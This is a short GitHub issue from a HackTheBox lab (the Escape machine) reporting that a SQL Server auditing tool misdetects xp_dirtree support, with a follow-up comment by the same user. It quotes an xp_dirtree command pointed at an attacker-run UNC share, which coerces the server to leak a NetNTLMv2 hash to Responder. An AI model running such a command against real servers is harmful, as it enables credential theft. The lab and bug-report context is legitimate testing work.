Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

xp_dirtree Incorrect Result #14

Open
Zamanry opened this issue Mar 27, 2023 · 1 comment
Open

xp_dirtree Incorrect Result #14

Zamanry opened this issue Mar 27, 2023 · 1 comment

Comments

@Zamanry
Copy link

Zamanry commented Mar 27, 2023

Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported:
image

I used impacket-mssclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share' which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public access only.

Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?
@Zamanry
Copy link
Author

Zamanry commented Mar 27, 2023

The machine does have a C:\. So permissions must be restricting the access.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Zamanry